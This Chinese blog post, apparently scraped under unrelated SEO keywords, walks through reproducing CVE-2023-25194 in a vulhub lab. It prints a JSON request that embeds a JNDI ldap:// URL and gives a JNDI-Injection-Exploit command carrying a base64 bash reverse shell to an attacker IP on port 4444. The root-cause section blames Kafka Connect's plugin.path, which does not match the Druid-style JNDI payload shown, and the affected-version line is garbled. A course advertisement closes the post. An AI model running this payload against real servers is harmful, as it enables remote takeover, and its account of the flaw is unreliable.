网站建设纪念币发售免费中文网站模板

网站建设纪念币发售,免费中文网站模板,余杭区住房与建设局网站,网站建设员工资漏洞概述 CVE-2023-25194 是 Apache Kafka Connect 中披露的一个高危远程代码执行#xff08;RCE#xff09;漏洞#xff0c;允许未经授权的攻击者通过 REST API 构造恶意请求#xff0c;在服务器上执行任意代码。漏洞编号#xff1a;CVE-2023-25194影响组件#xff1a;A…漏洞概述CVE-2023-25194是 Apache Kafka Connect 中披露的一个高危远程代码执行RCE漏洞允许未经授权的攻击者通过 REST API 构造恶意请求在服务器上执行任意代码。漏洞编号CVE-2023-25194影响组件Apache Kafka Connect漏洞类型远程代码执行RCE漏洞等级高危公开时间2023 年 2 月修复版本Apache Kafka 3.4.0漏洞成因分析Kafka Connect 是 Apache Kafka 提供的一个插件化框架允许用户将 Kafka 与外部系统如数据库、Elasticsearch、HDFS 等连接。Kafka Connect 提供了一个 REST 接口允许动态上传 connector 的配置和插件路径。漏洞的关键在于服务端未对 plugin.path 参数进行严格限制允许攻击者加载任意目录下的恶意 JAR 包。攻击者可以伪造一个 connector 配置请求指定plugin.path为任意路径如/tmp/evil/并配合上传的恶意 JAR 文件使 Kafka Connect 加载恶意类并执行从而实现远程代码执行。影响范围受影响版本所有 Apache Kafka 3.4.0的版本主要影响 Kafka Connect 组件前提条件Kafka Connect 的 REST API 对外开放默认监听在 8083 端口未启用认证或鉴权机制攻击者能够上传或指定 JAR 路径复现流程环境使用vulhubdocker启动靶场环境—浏览器访问xx.xx.xx.xx.:8888首先来到漏洞位置之后单击Apply进行抓包将下面的JSON替换{ type:kafka, spec:{ type:kafka, ioConfig:{ type:kafka, consumerProperties:{ bootstrap.servers:127.0.0.1:6666, sasl.mechanism:SCRAM-SHA-256, security.protocol:SASL_SSL, sasl.jaas.config:com.sun.security.auth.module.JndiLoginModule required user.provider.url\ldap://192.168.200.138:1389/tdk4dd\ useFirstPass\true\ serviceName\x\ debug\true\ group.provider.url\xxx\; }, topic:test, useEarliestOffset:true, inputFormat:{ type:regex, pattern:([\\s\\S]*), listDelimiter:56616469-6de2-9da4-efb8-8f416e6e6965, columns:[ raw ] } }, dataSchema:{ dataSource:sample, timestampSpec:{ column:!!!_no_such_column_!!!, missingValue:1970-01-01T00:00:00Z }, dimensionsSpec:{ }, granularitySpec:{ rollup:false } }, tuningConfig:{ type:kafka } }, samplerConfig:{ numRows:500, timeoutMs:15000 } }开启rmi服务的工具启动的JAVA版本为java 8java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMzgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}” -A 192.168.200.138同时监听4444端口此端口为上述base64加密的反弹shell端口将上面代码中的IP:port替换成自己工具生成的命令注意必须要使用ldap://xxxx/xxxx使用rmi的工具有回显但是监听不到替换完后进行放包工具回显监听成功修复方案Apache 在 3.4.0 版本中修复了该漏洞修复措施包括限制 plugin.path 参数来源禁止通过 REST 接口动态配置 plugin 路径强制使用服务端配置中明确指定的 plugin 路径建议措施立即升级Kafka 至3.4.0 或以上版本禁止公网直接访问 Kafka Connect REST 接口启用认证与授权机制如 Basic Auth、OAuth设置白名单 plugin.path避免动态加载任意目录学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】